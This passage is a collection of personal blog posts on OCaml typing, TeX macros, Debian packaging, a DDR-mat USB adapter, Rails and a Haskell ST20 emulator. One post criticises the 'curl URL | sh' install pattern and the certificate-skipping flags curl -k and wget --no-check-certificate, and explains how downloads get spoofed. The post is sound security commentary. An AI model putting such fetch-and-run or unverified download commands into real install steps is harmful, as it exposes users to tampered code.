% ocamlc -i types.ml val p : 'a -> 'b -> ('a -> 'b -> 'c) -> 'c val r : unit -> (((((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> ((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> 'd) -> 'd) -> ((((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> ((((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> ((('a -> 'a) -> ('a -> 'a) -> 'b) -> 'b) -> 'c) -> 'c) -> 'd) -> 'd) -> 'e) -> 'e

But what’s interesting about this program is that we can add (or remove) lines to study how input size can alter the processing time and output type size. It explodes:

n wc -c time leaves(n)

1 98 15ms 1

2 167 15ms 2

3 610 15ms 8

4 11630 38ms 128

5 4276270 6.3s 32768

Observing the number of ('a -> 'a) leaves in the output type reveals that it is is squared and doubled at each step, leading to an exponential growth.

In practice, this effect does not appear in day-to-day programs because programmers annotate the top-level declarations with their types. In that case, the size of the types would be merely proportional to the size of the program, because the type annotation would be gigantic.

Also, programmers tend to write functions that do something useful, which these do not seem to do ☺.

Bring your own switch

Etienne Millon — Thu, 05 Jun 2014 00:00:00 UT

TeX is a very primitive language. Everything is dynamic, even parsing. This explains in part why it’s so long to compile.

It also means that it’s very flexible : it’s possible to define your own control structures. Here is a small explanation of an implementation of a “switch” macro I made last year. It is released as part of my discotex library (a collection of macros, really).

We want to define a control structure that we can use in the following way:

\switch{what}{case1}{then1} {case2}{then2} {case3}{then3} {END}

Then, if what is equal to case1, the whole construct evaluates to then1, etc. This looks like a function with a variable number of arguments, but actually this is well adapted to how TeX works.

In TeX, control is provided through macros, i.e. rules to rewrite text. Suppose we want to do a macro that expands to “x and y”. LaTeX users are used to the following syntax:

\newcommand{\couple}[2]{#1 and #2}

But in TeX this is written:

\def\couple#1#2{#1 and #2}

Which roughly means that after reading \couple, TeX will read two strings¹ and bind them to #1 and #2 in the body. So \couple{A}{B} is expanded to A and B.

Here comes the trick used for defining variadic functions: if more arguments are provided than the number of arguments at the definition point, the extra ones are kept at their place. If fewer arguments are provided, the strings after the call site will be used. So, one can look at TeX functions as just a system to pop strings from the calling site.

Using this, we can implement \switch:

After reading \switch, read two arguments so that we’re considering \switch{what}{x}.

If x is equal to END, it is an error: we did not find the entry. The END string is not special to TeX, it is just a convention of our macro.

Otherwise, pop one more string so that we’re considering \switch{what}{case}{then}.

If what is not equal to case, we have to recursively call \switch{what} which will pop the rest.

If what is equal to case, then the result is then. But it is not enough to return it: we have to pop strings until END is reached. Otherwise they would be output normally and put it the document.

These 3 points map well to the final TeX code.

To read the first case, we write a function with only two parameters. For string comparison we use \ifstrequal{a}{b}{t}{f}² which expands to t if a and b are equal, or f otherwise. Note that \switch@next is the name of a function. In .sty files, it is possible to use @ in symbol names. It is a convention for private macros as they can not be directly used in .tex files.

\def\switch#1#2{ \ifstrequal{#2}{END}{ \errmessage{switch : case "#1" not found} }{ \switch@next{#1}{#2} } }

It is also used to do the actual comparison and the recursive call.

\def\switch@next#1#2#3{ \ifstrequal{#1}{#2} {#3\switch@last} { \switch{#1} } }

Then \switch@last is a simple recursive function which simulates a loop. Because the recursive call is done without an explicit parameter, it will keep on popping strings until finding END.

\def\switch@last#1{ \ifstrequal{#1}{END}{} {\switch@last} }

That’s it, the macro works. You can even try it!

I am not sure that I would like to write more complex control structures but this was useful to me both in writing it and using it. I hope that you enjoyed it!

I am not sure that this is the correct denomination. For example it will read a string between curly braces, or a single character if they are omitted. In that case it also eats whitespace, which is why you need stuff like \xspace to prevent your macros from glueing string together.↩︎

It is from the etoolbox package. How it works is an implementation detail here, though it would probably be interesting.↩︎

My part of work in Debian Jessie

Etienne Millon — Fri, 21 Nov 2014 00:00:00 UT

Right now, Debian Jessie is frozen, and in a fairly good shape. The amount of RC bugs is low, which means that the release should be “quite” near (“when it is ready”).

It is a good time to make a summary of my contributions during this release cycle.

New packages in Debian

For Jessie I have added no less than 6 new packages to the archive.

subliminal is a tool to automatically download subtitles for movie files. Packaging it required to also package a few of its dependencies that were not available in Debian: babelfish, enzyme, guessit, and pysrt.

glyr is a library to query lyrics sites. I packaged it because the new version of gmpc requires it, but at the moment it is just a leaf package.

New packages I’m taking care of

I have the pleasure of being the new maintainer for feedparser, a Python library for parsing RSS and Atom feeds. It is my most popular package: according to popcon, 40% of users have it installed! During this released, I ported back the work made on Ubuntu, and worked on providing a Python 3 version of this package.

Updates on my packages

gmpc and gmpc-plugins did not change a lot. Upstream is working on a big new version but it is not released yet. During this Debian cycle, I mostly did janitorial work: I disabled outdated provider plugins, enable multi-arch support, and ported to a recent version of Vala.

rss2email got a new upstream maintainer. This is really great since the code needed some love. The whole program got rewritten in Python 3, and this mandated a major version bump, creating the rss2email 3.x branch.

One of the side-effects of this rewrite is that the configuration file format changed. Actually the 2.x version used a plain python file for configuration, which was eval()uated within the program’s context. Now it is based on ConfigParser. The on-disk state file, which serializes what feeds you are subscribed to, and what is the last time you refreshed them, changed its format too from a pickle file to a JSON file.

This incompatibility is necessary and welcome, but is tough to manage within the context of a software distribution. If a user upgrades his packages, he should find his programs working as before. So, I wrote a r2e-migrate script that converts a 2.x state file to a 3.x state file. Designing a clean upgrade path was very interesting. Indeed, it is not possible to do this during the package installation: since the config and state files are in every user’s $HOME, it is necessary to wait for each user to do his migration. The solution I arrived at is the following: when rss2email 3.x starts, and has no state file, it checks if a rss2email 2.x exists. Then it prompts the user to run r2e-migrate. A few iterations were necessary before it worked as I wanted, so I am happy to have used the experimental suite for this. Once everything was working I uploaded the package to unstable and it seems to be working well. I am very happy with how this went, and I could close a lot of bugs in this package, also thanks to the new responsive upstream.

visualboyadvance only got cosmetic changes: a patch for fixing the build with the new GCC flags, enabling hardening etc. I somehow missed the notification email for an important bug (#740292) with a patch that I merged but unfortunately it is too late to include it in Jessie. I would like to give the package more love for the next release, maybe including the newer vba-m fork.

zsnes is an interesting package to maintain because it’s written in x86 assembly and has been dormant upstream for a few years now. During this release cycle there were no real breakthroughs, but a lot of little niceties. For example, we now have a debug package, and build packages for kfreebsd and the hurd. Enabling hardening options also made us discover several memory manipulation errors.

I would like to include a more recent upstream snapshot, but the whole situation seems to be a little complicated as there seem to be several forks lying around.

Package given for adoption

In 2012 I started to take care of the coin* packages. I adopted coinor-cbc and began to plan a transition plan for all the related packages, but because of a lack of time and interest I did not go all the way.

Fortunately Miles Lubin proposed to adopt these packages and is doing a great work on them. Thanks Miles!

Incomplete work

I wanted to package several programs that did not make it to the archive.

brogue is a rogue-like in the most traditional fashion: grid-based and turn by turn. Most of the packaging work I did was on an unpackaged dependency, libtcod. It needed a bit of work so that it can be used installed in /usr and not from an unpacked source tree.

opentyrian is a free rewrite of the classic shoot-em-up Tyrian. As usual for this kind of projects, it only covers the software part. You still need a copy of the original game to play. In that case it is easier since the game can be downloaded from the author’s website. But since it is not free, Debian can not host these files. So it is necessary to download it at install time using a tool named game-data-packager. I worked with Alexandre Detiste on a patch to support this (#739486), but unfortunately the project seems dormant and it is blocking for the inclusion of opentyrian in Debian.

stepmania is an open source clone of the “Dance Dance Revolution” game. It is a very popular piece of software, and an Intend To Package bug has been open for it since 2003. But it used to include non-free (and actually, copyright-infringing) pieces of artwork from the original game, which used to make it unsuitable for inclusion. However the newer versions are more compliant and I am still working on this. There are two problems remaining: first, there is a lot of code and artwork for which the copyright and licensing information is unclear (though it does seem that the infringing material has been removed). And second, it embeds a lot of libraries; it’s necessary to patch it so that it can use the system copies. I sincerely hope that it will be part of Stretch since I could not deliver it for Jessie.

Debian Maintainer

So far, every time I need to push a package to the Debian archive, I need to ask someone with upload permissions to review my work and upload it. It ensures that the archive stays legal and with a great quality, but it is definitely a non negligible amount of friction every time I need to upload a package.

A couple weeks ago I decided to apply as a Debian Maintainer. Once this will be done, I will be able to upload my packages without this sponsoring step. Exciting!

Let’s all hope that the freeze will be over soon and we will enjoy once again a great release.

Converting a Dance Dance Revolution mat to USB

Etienne Millon — Thu, 27 Nov 2014 00:00:00 UT

Abstract: I transform a Playstation/parallel port converter to USB. This includes finding the pinout of the previous circuit, making an AVR toolchain work, and writing the firmware. Some bugs are found, and fixed. The result is open source.

Do you pine for the days when people were people and wrote their own device drivers? Some days are still like that, you just have to take the opportunity.

Recently while organizing my place I found two abandoned items that were meant to meet each other: a Dance Dance Revolution mat and a Teensy++ development board. This project is the story of their union.

Finding the pinout

So, I stumbled upon an old DDR mat and I wanted to play with it. The easiest way is using Stepmania, a simulator that works on Linux (and that I am trying to package for Debian). But some interface is needed to connect dancing mats (usually made for the Playstation) to a computer.

In a previous life I replaced the Playstation connector of this mat with a parallel port connector. In the beginning of the 2000s, the popular circuit to do this was Direct Pad Pro, and on Linux there was a similar driver documented in joystick-parport.txt.

Needless to say, I do not have a parallel port on my computer anymore, so some conversion is required. I also happen to have a USB development board on hand, so a possible solution is to program it to drive the Playstation mat.

On the above picture, two things are connected to the parallel port: the DDR mat and a female SNES connector. The driver indeed supported several gamepads, even of different types.

The first step was to note the pinout of the existing connection:

DB25 2 ───────── orange 3 ───────── yellow 4 ───────── blue 5 ──▷|─┐ 6 ──▷|─┤ 7 ──▷|─┼─── pink 8 ──▷|─┤ 9 ──▷|─┘ 11 ───────── brown 19 ─────┐ 20 ─────┤ 21 ─────┤ 22 ─────┼─── black 23 ─────┤ 24 ─────┤ 25 ─────┘ NC ── green

Looking at the kernel documentation, it means that the 11 is the data pin for the Playstation connector (the SNES pad was #1 and the PSX pad was #2).

This was enough to reconstruct the correct pinout. Note that the kernel numbers PSX pins in the opposite order of everything else I have seen. The following table uses kernel order.

Color DB25 # PSX # Function

orange 2 8 Command

yellow 3 4 Select

blue 4 3 Clock

pink 5-9 ¹ 5 Vcc

brown 11 9 Data

black 19-25 6 Ground

green NC

At first, I was worried by the green wire that was not connected but this confirms that it was not needed.

Connecting it to the teensy++

The teensy++ is a development board with an AT90USB1286 microcontroller, from the AVR family. It has many GPIO ports, so I had to make a choice regarding the pins to be used. I chose this pinout:

AVR port Color Function Direction

Vcc pink Vcc Power

GND black Ground Power

PC0 brown Data D→H

PC1 orange Command H→D

PC2 yellow Select H→D

PC3 blue Clock H→D

The Data signal is the only one that goes from the Device (DDR mat) to the Host (microcontroller), but since each pin can be used as an input or as an output, this does not constrain the choice.

So, let’s connect the DDR mat to the microcontroller. As the board already has male pin headers for breadboard usage, I soldered female pin headers to wires.

Programming the teensy++

I had two main problems writing the firmware: first, the manufacturer seems to recommend Teensy Loader to program the microcontroller. This is a GUI app and which does not seem to be free software. Fortunately, I found a packaged version of teensy-loader-cli which is CLI, GPL3, and works well. The following command will program the microcontroller:

teensy-loader-cli -mmcu=at90usb1286 blink_slow_Teensy2pp.hex

The second quirk is that most of the documentation that can be found is for using the teensy++ as an Arduino. But I prefer writing low-level code: just memory-mapped registers, a C compiler, and me. So I aptitude-installed gcc-avr and avr-lib and opened vim.

There are several differences in how you program microcontrollers as an Arduino and as a plain AVR. For example here is how you configure PC0 to be an input with a pull-up resistor (so that it reads 1 when the pin is disconnected):

DDRC &= ~(1 << PC0); PORTC |= (1 << PC0);

This clears bit PC0 of register DDRC (Data Direction Register C, nothing to do with Dance Dance Revolution) and sets bit PC0 of the PORTC register. Instead, the corresponding Arduino code is:

pinMode(10, INPUT_PULLUP);

To do that, the library has a mapping from pin numbers (an Arduino-specific terminology, it seems) to register names.

The PSX protocol

Time to write the code itself. My absolute reference for programming and interfacing the Playstation is Everything You Have Always Wanted to Know about the Playstation But Were Afraid to Ask. See section 9 for controllers.

The idea is that every frame (16 ms), Select becomes low, and bytes are transfered, LSB first, in a synchronous way over the Command (D→H) and Data (H→D) pins. Select becomes high back again after all bytes are transfered.

This means that every time a bit is transfered to the gamepad, a bit is read at the same time. For every bit, the following operations are needed:

set Command according to the bit to transmit;

put Clock down;

wait half a clock cycle;

read Data: that is the bit received;

put Clock up;

wait half a clock cycle.

Or, if you prefer in C:

static uint8_t transmit(uint8_t in) { uint8_t out = 0; for (int i = 0; i < 8 ; i++) { int bit_in = in & (1 << i); if (bit_in) { signal_up(PSX_PIN_CMD); } else { signal_down(PSX_PIN_CMD); } signal_down(PSX_PIN_CLOCK); _delay_us(DELAY_CLOCK_US); int bit_out = signal_read(PSX_PIN_DATA); if (bit_out) { out |= (1 << i); } else { out &= ~(1 << i); } signal_up(PSX_PIN_CLOCK); _delay_us(DELAY_CLOCK_US); } return out; }

During a normal operation, the bytes exchanged should be the following:

Byte # Command Data

1 0x01 0xFF

2 0x42 0x41

3 0x00 0x5A

4 0x00 data1

5 0x00 data2

Keypress information can be found in the 16-bit number (data2 << 8) | data1). If a bit is 0, it means that the corresponding button is pressed.

Bit # Key Bit # Key

0 Select 8 L2

1 (always 1) 9 R2

2 (always 1) 10 L1

3 Start 11 R1

4 Up 12 Triangle

5 Right 13 Circle

6 Down 14 Cross

7 Left 15 Square

At first, it was not obvious how to debug the implementation of this protocol. Fortunately, this microcontroller has a USB port and it is possible to transmit debug messages using the usb_debug_only code sample from the manufacturer.

With no real surprise, my first iteration did not work and printed the following.

01 -> FF 42 -> FF 00 -> FF 00 -> FF 00 -> FF

I re-read my code carefully and I found two bugs:

I was not putting Clock back up.

I was using PORTC for reading input even though PINC was needed… the registers are mapped in memory but not at the same address for reading and writing. Rookie mistake.

After reprogramming and reloading I saw a satisfying output:

01 -> FF 42 -> 41 00 -> 5A 00 -> FF 00 -> DF

The output bytes correspond to the device ID part (41 5A) and a value (FF DF) that indicates that nothing is pressed except the Circle button.

Interfacing with the computer

At that moment the firmware just computes the result and prints it over USB. To do something useful with it on the computer side, this information needs to be exposed as a USB joystick or keyboard. I used the usb_keyboard code sample which exports a usb_keyboard_press function.

It was necessary to slightly alter the main loop: in a debug setting it is possible to print the state at every frame, but a keyboard works differently. You are supposed to send a message only when a key is pressed. So, at each frame, it is necessary to keep track of the previous state and to diff it with the current one. If a bit was previously set (meaning that the button is not pressed) and is now set, the USB code has to be notified that a key was pressed. This code is run for every btn if the state changes:

int was_released = last_js & (1 << btn); int is_pressed = !(js & (1 << btn)); if (was_released && is_pressed) { int key = mapping[btn]; usb_keyboard_press(key, 0); }

This is simple, yet it works quite well and is enough to play Stepmania!

I noticed that however it does not work perfectly since the key is released immediately: this is a problem for DDR since the patterns where you have to hold keys do not work.

Let’s have a look at this function from the library:

int8_t usb_keyboard_press(uint8_t key, uint8_t modifier) { int8_t r; keyboard_modifier_keys = modifier; keyboard_keys[0] = key; r = usb_keyboard_send(); if (r) return r; keyboard_modifier_keys = 0; keyboard_keys[0] = 0; return usb_keyboard_send(); }

When usb_keyboard_send is called, it transmits the contents of keyboard_keys over USB. All nonzero elements correspond to keys that are pressed. So what this function does is transmit a state where a key is pressed, then transmit a state where nothing is pressed.

This has two limitations:

it does not separate key press from key release;

it does not work if several keys are pressed at once.

Making rollover work

It would be nice to implement n-key rollover (NKRO) so that all keys can be pressed independently. This is possible, by increasing the size of keyboard_keys to 14 (the number of keys on a Playstation gamepad). But this means fiddling with the USB descriptor code, so that the USB host side can know how many bytes to expect, and I am not really comfortable with that.

In the library, the size of keyboard_keys is 6, so I stuck with 6-key rollover which ought to be enough for everybody.

Here is the new version of the code that is called for every button:

int was_pressed = !(last_js & (1 << i)); int is_pressed = !(js & (1 << i)); if (is_pressed && !was_pressed) { keypress_add(mapping[i]); } if (was_pressed && !is_pressed) { keypress_remove(mapping[i]); }

The keypress_add function walks the keyboard_keys array and replace the first 0 with the correct button. keypress_remove does the opposite.

And… this works! I found this very refreshing to write low-level code for an existing, documented protocol. If you are interested, all the code can be found in this github repository. Thanks for reading!

Protected by 1N4148 diodes.↩︎

On the curl | sh pattern

Etienne Millon — Sat, 27 Dec 2014 00:00:00 UT

Like many, I noticed a common pattern in the past few years: software authors publishing instructions to download and install their program from their website, directly in the terminal, through a variant of curl URL | sh.

Since I think that it should be considered bad practice, I created a tumblr called “curl | sh” which lists occurrences of this pattern.

I would like to address some of the criticism I received about this list. Most came from Hacker News where it has been posted.

“If the URL starts with HTTPS, it is secure”

The websites I post here fall roughly into three categories:

downloads over HTTP.

downloads over HTTPS with certificate verification deactivated (curl -k/--insecure, wget --no-check-certificate).

downloads over HTTPS.

Type 1 downloads are the most insecure ones, since it is possible to change the original response from the server without the client noticing. Modifying traffic like this is very easy, for example on wifi hotspots. This is not something that happens only in hacker movies: some places use this to insert ads in web pages.

Type 2 downloads are a bit better since the content is encrypted, but encryption without authentication is mostly useless since you do not know who you are talking to. The client will connect to anything that responds to url:443, which means that it is still possible to spoof a connection and actively change the response. To the client, an encrypted connection to an attacker looks the same as an encrypted connection to the legit site.

Type 3 downloads prevent this because they require that the certificate presented by the server matches the server name and is signed by a trusted Certificate Authority (CA). This means that the certificate has been handed to the person in charge of the website.

This is not foolproof either because the client has to trust a list of root CAs. This can be a problem for example in corporate environments, where the company can include their own CA to this list of trusted roots. At every HTTPS connection, they can create on the fly a certificate that is signed by themselves and with the correct server name. In other words, they can vouch for the identity of any website. As a consequence, they are able to spoof the TLS connection, in the same way that it is possible for type 2 downloads. Having a rogue trusted root is almost the same as disabling certification checking since it is able to create correct certificates for any site.

A way to mitigate this problem is to enable certificate pinning, which alerts the user when the certificate presented by a website has changed since the last time they consulted it. But this is not a perfect solution, since there are legitimate reasons to change a certificate. For example, they are usually limited in time, and every year or so it is necessary to generate a new one. However, if a website presents a certificate with a different anchor than before, this may mean that the connection is being spoofed.

Note that the main reason people disable certificate checking (i.e., use type 2 instead of type 3) is because they use self-signed certificates. These are certificates that are not signed by a CA. They are free and simpler to use, but do not authenticate the server, so they are rejected by default by clients. In browsers, this sometimes corresponds to a big scary warning, and by a yellow or open lock instead of the green, closed lock that we have all been educated to respect. It is however possible to pin them, so it is better than plain HTTP. The effort required to spoof a self-signed certificate is also greater than to spoof plain HTTP, but both are reasonably easy.

“apt-get install $pkg does the same thing”

Not exactly. When you install a package from the Debian archive, the .deb file is retrieved along with a digital signature that authenticates the file. This signature is checked against a key that is on all Debian systems. You obtain it at install time on a CD, but you can easily get it from another trusted Debian system if you can not trust a CD from some reason. The key here (pun intended) is that this scheme authenticates files and not connections.

For example, if a HTTPS website is compromised, you will not be able to detect that the files have been modified on the server (and thus curl | sh will work as before). But if your local Debian mirror is compromised, the files you download will fail to validate against the key that is on your computer.

Of course, a signature from the Debian archive signing key does not automatically ensure that the package will not delete your root filesystem. But it ensures that the software has not been tampered with since its maintainer has uploaded it. Also, since it goes through a distribution, you may expect that some quality assurance has been made there.

It is hard to distribute software in a secure manner. Protecting the connection is definitely a first step, but protecting the files themselves is better. Fortunately it is possible to take this further, by having reproducible builds for example. I highly encourage anyone to read the triangle of secure code delivery on what it takes to deliver programs in a secure manner.

In the meantime, feel free to send me more examples of this pattern so that I can publish them. Get in touch either directly on curl | sh, on twitter or by email (see the footer below). Thanks for reading!

Santa made me learn Rails in a week

Etienne Millon — Fri, 03 Apr 2015 00:00:00 UT

Abstract: I released Secret Santa Creator, a free website to organize events where every participant makes a gift to a random other one. To do that I learnt Ruby on Rails in a week and it was awesome. As usual I put the source on Github.

Every year I take part in Secret Santa: within a group of friends, everyone has a “target” to whom he has to make a gift.

There are several techniques to organize that. The simplest one is to have anyone put their name in a hat, shuffle everything, and have everyone pick one name. But to do that, you need to put everyone in the same room before the event and that is not always convenient. Another possibility is to ask someone to pick the names, but he will know who has to make a gift to him.

So last year, I decided to script this. I made a small python script that takes a list of names and emails, shuffles them and sends email to the correct persons. It worked well. Technically, I could know who was supposed to make me a gift by watching my mail logs, but short of sophisticated cryptographic protocols, you have to trust the organizer not to cheat anyway.

In a way, this was a good MVP; but it was not very reusable. Indeed, some friends asked me the program so that they could use it with other friends, but I could not expect everybody to have python and sendmail installed on their machines. To cover their needs, it turns out that there are a lot of websites that offer this service, so I ended up pointing them to these websites.

This year, I was asked again about how to organize a Secret Santa, so I figured, why not build a website? This had the opportunity to be directly useful to my friends, so I jumped in. Plus, this was a good excuse to learn new technologies. I gave myself one week to learn Ruby on Rails, code the website and deploy it on Heroku. That is what the cool kids do, right?

My web stack of choice usually revolves around Flask, which is simple and powerful, but it does not do a lot of things out of the box. That is one the strengths of this microframework, but I wanted to try something more integrated. Django would have been a good choice too, but I was curious about Ruby on Rails and the Ruby ecosystem in general.

I had bookmarked the Ruby on Rails Tutorial by Michael Hartl, which seemed a good resource. Indeed, it is very nice, seems it is up to date and emphasizes not only on the code but also on how to deploy a project, or even how to keep a project under source control. When you learn a new technology, it is not obvious which files should get checked in. If you asked me before, I would probably have put Gemfile.lock out of git.

The book uses particular versions of the different gems, so this has been tested and works flawlessly. At first I was afraid to have to use rvm, which I heard does not work too well. I prefer using a ruby interpreter provided by my distribution, but I am OK with using third-party gems. That is my policy for Python too: I use a system python and a virtualenv for each project. Ruby’s bundler seems to work like this.

I was very pleased by the first chapter of the book which explains how to write a minimal rails site and immediately deploying it to Heroku. I found it astonishing that to do that, absolutely zero configuration was needed. That is in part thanks to Rails’ Convention over Configuration philosophy and in part because Heroku is made for Rails app by default.

By contrast, to deploy a Flask app these days on a server I control, I have to write an Ansible playbook. Mostly copy & pasted from previous projects but still, the friction is incomparable. This is not specific to Rails though, so I may use Heroku for Python one-off projects too now.

The rest of the book focuses on creating a microblog site, first using the scaffold technique and then by hand.

I liked that there is a lot of structure in Rails application: everything has a “correct place” and there is a clear separation between everything. Even tests are automatically separated into different folders. Also, I have not created a single .rb file by hand; everything was created by rails generate. This is the sweet spot between having to do everything by hand and coding in an IDE.

As for the Ruby language itself, I figured that I would learn it on the fly since it is similar enough to Python. That worked out well.

I like the :symbols a lot, they remind me of Lisp. It makes a clear distinction between strings used as keys and strings that are meant to be printed. I am not a fan of the colon syntax itself, especially when they are mixed with hashes (k: :v) but syntax highlighting helps in that case of course.

The concrete syntax is a bit weird. I like the explicit end, but I am still not sure whether whitespace is significant. Same goes for expressions: it is a bit unclear when parentheses are needed. I think that it is the same as in Coffeescript. I hope that it is not ambiguous and that bugs arising from that are rare.

That should be covered by tests anyway. The book encourages to write a lot of tests, which is quite nice. The testing ecosystem is interesting, particularly minitest and guard, which make TDD very easy. Guard is a bit too aggressive, which means that it will sometimes not run all the needed tests. This is probably just a matter of writing a better Guardfile.

Anyway, I went through chapters 1 to 9 and it was enough to get a good grasp of how to code a Rails site.

The website I wanted to write would work like this:

go to the homepage;

create a new event;

fill in info: names, emails, constraints;

click send;

emails are sent.

It is actually a bit more complicated since it also handles edition, but overall it is a very simple website. With the Rails Tutorial almost done I had enough to build it. Actually, Secret Santa Creator is even simpler since it does not require authentication. I did it mostly using Test-Driven Development, as in the tutorial.

The hardest part was definitely creating nested forms. Every event has a list of participants, and a list of constraints. It is thus necessary to create a form that can edit this list structure, by directly editing participants or constraints from the “edit event” form, but also removing or adding some.

I found the cocoon gem which works fine for this, and I could build this kind of form:

To send email in my Python script MVP, I just piped stuff to sendmail. Fortunately, Ruby on Rails has an integrated system to do that, with Action Mailer. You just need to setup SMTP configuration and write rails generate mailer and boom, you can send emails. Heroku has a plugin for sendgrid with a reasonable free tier, so I used that.

Coding the actual website took approximately two days. It is possible to be that fast only because Rails insists that easy tasks should become no-brainers.

You can see the site here and the source on Github.

It works reasonably fine, barring a few quirks in the UI. I used it myself to organize several events this year, and a couple friends did the same. I would call that a success! I plan to work a bit more on it at the end of the year and try to get a little more users. I am curious to see how it goes!

A lens-based ST20 emulator

Etienne Millon — Thu, 20 Aug 2015 00:00:00 UT

Every year, as part of the SSTIC conference, there is a forensics/reverse engineering challenge. I participated in the 2015 edition. Though I did not manage to complete it, I made an emulator for the exotic ST20 architecture, which is probably worth describing here.

Note that this emulator is not really optimized for pure speed. In the actual challenge I actually had to rewrite it as pure Haskell (i.e., removing the emulation part) so that it was faster. Instead, the goal of this article is to show a few techniques to write powerful emulators in Haskell.

{-# LANGUAGE GeneralizedNewtypeDeriving #-} {-# LANGUAGE Rank2Types #-} {-# LANGUAGE TemplateHaskell #-} import Control.Applicative import Control.Concurrent import Control.Monad.RWS import Control.Lens hiding (imap, op) import Data.Bits import Data.Int import Data.Maybe import Data.Word import Numeric import System.Exit import System.IO import Text.Printf import qualified Data.ByteString as BS import qualified Data.Map as M import qualified Data.Set as S

The evaluation monad

This program uses Template Haskell to define lenses, so unfortunately we need to start with a few type definitions.

The ST20’s memory goes from 0x80000000 to 0x7fffffff:

type Address = Int32

We’ll represent the memory using a map. The performance is surprisingly close to that of an array. It is possible to get significantly speeds up memory access by using an IOUArray but it turns loads and stores become monadic operations and makes it impossible to use lenses.

type Mem = M.Map Address Word8

As we’ll see, transputers (hardware threads) can communicate together. We’ll be able to connect it either between them, or to a tty.

data IChannel = InChan (Chan Word8) | InHandle Handle data OChannel = OutChan (Chan Word8) | OutHandle Handle type IChannelMap = [(Int32, IChannel)] type OChannelMap = [(Int32, OChannel)]

All evaluations take place in a Eval Monad which is a monad transformer stack with the following capabilities:

read and write an EvalState value;

read an EvalEnv value

do some I/O.

newtype Eval a = Eval (RWST EvalEnv () EvalState IO a) deriving ( Functor , Monad , MonadIO , MonadReader EvalEnv , MonadState EvalState ) data EvalEnv = EvalEnv { envInChans :: IChannelMap , envOutChans :: OChannelMap } data EvalState = EvalState { _iptr :: !Address , _intStack :: [Int32] , _wptr :: !Int32 , _mem :: !Mem } $(makeLenses ''EvalState) runEval :: Mem -> IChannelMap -> OChannelMap -> Eval a -> IO a runEval memory imap omap (Eval m) = fst <$> evalRWST m env st where env = EvalEnv imap omap st = EvalState { _iptr = memStart , _intStack = [] , _wptr = 0xaaaaaaaa , _mem = memory }

The above $(...) is a Template Haskell splice. It creates lenses based on the record declaration of EvalState. Lenses are a very powerful tool that makes it possible to compose record reads and updates in a functional way. Here, it defines a lens for each record field; for example, the splice expands to a top-level declaration iptr :: Lens' EvalState Address. But we will define our own lenses too, and everything will remain composable.

Memory

This is naturally adapted to byte access:

memByteOpt :: Address -> Lens' EvalState (Maybe Word8) memByteOpt addr = mem . at addr

See? We composed the mem lens (between an evaluation state and a memory state) with at addr, which is a lens between a memory state and the value at address addr. Well, not exactly: at actually returns a Maybe Word8. We will assume that all memory accesses will succeed, so we want a lens that returns a plain Word8. To achieve this, we can compose with a lens that treats Maybe a as a container of a:

maybeLens :: Lens' (Maybe a) a maybeLens = lens fromJust (const Just) memByte :: Address -> Lens' EvalState Word8 memByte addr = memByteOpt addr . maybeLens

Sometimes we will also need to access memory word by word. To achieve that, we first define conversion functions.

bytesToWord :: (Word8, Word8, Word8, Word8) -> Int32 bytesToWord (b0, b1, b2, b3) = sum [ fromIntegral b0 , fromIntegral b1 `shiftL` 8 , fromIntegral b2 `shiftL` 16 , fromIntegral b3 `shiftL` 24 ] wordToBytes :: Int32 -> (Word8, Word8, Word8, Word8) wordToBytes w = (b0, b1, b2, b3) where b0 = fromIntegral $ w .&. 0x000000ff b1 = fromIntegral $ (w .&. 0x0000ff00) `shiftR` 8 b2 = fromIntegral $ (w .&. 0x00ff0000) `shiftR` 16 b3 = fromIntegral $ (w .&. 0xff000000) `shiftR` 24

Then, we can define a lens focusing on a 32-bit value.

compose :: [a -> a] -> a -> a compose = foldr (.) id get32 :: Address -> EvalState -> Int32 get32 base s = bytesToWord (b0, b1, b2, b3) where b0 = s ^. memByte base b1 = s ^. memByte (base + 1) b2 = s ^. memByte (base + 2) b3 = s ^. memByte (base + 3) set32 :: Address -> EvalState -> Int32 -> EvalState set32 base s v = compose [ set (memByte base) b0 , set (memByte (base + 1)) b1 , set (memByte (base + 2)) b2 , set (memByte (base + 3)) b3 ] s where (b0, b1, b2, b3) = wordToBytes v memWord :: Address -> Lens' EvalState Int32 memWord addr = lens (get32 addr) (set32 addr)

The instruction set reference defines a handy operator to shift an address by a word offset:

(@@) :: Address -> Int32 -> Address a @@ n = a + 4 * n

It will be also handy to access the memory in list chunks:

mem8s :: Address -> Int32 -> Lens' EvalState [Word8] mem8s base len = lens getList setList where getList s = map (\ off -> s ^. memByte (base + off)) [0 .. len - 1] setList s0 ws = compose (zipWith (\ off w -> set (memByte (base + off)) w) [0..] ws) s0

Instruction decoding

Instructions are usually encoded on a single byte: the opcode is in the first nibble, and a parameter is in the second one. For example this is how a LDC (load constant) is encoded:

.--- 0x40 LDC |.--- 0x5 || 0x45 LDC 0x5

This only works for 4-bytes constants. To load bigger constants, there is a “prefix” operation that will shift the current operand:

.-------- 0x20 PFX |.-------- 0x2 || || .--- 0x40 LDC || |.--- 0x5 || || 0x22 0x45 LDC 0x25

Those are chainable; for example 0x21 0x22 0x45 encodes LDC 0x125.

Another prefix shifts and complements the current operand value:

.-------- 0x60 NFX |.-------- 0x2 || || .--- 0x40 LDC || |.--- 0x5 || || 0x62 0x45 LDC (~0x25)

The ST20 architecture actually provides two type of instructions:

“primary” instructions such as LDC. Their operand is directly encoded.

“secondary” instructions such as MINT (equivalent to LDC 0x80000000). They do not have operands. On the contrary, they are actually a special case of the first type, using a special OPR n opcode. For example, MINT is OPR 0x42, which is encoded using 0x24 0xF2.

We know enough to draft an instruction decoder.

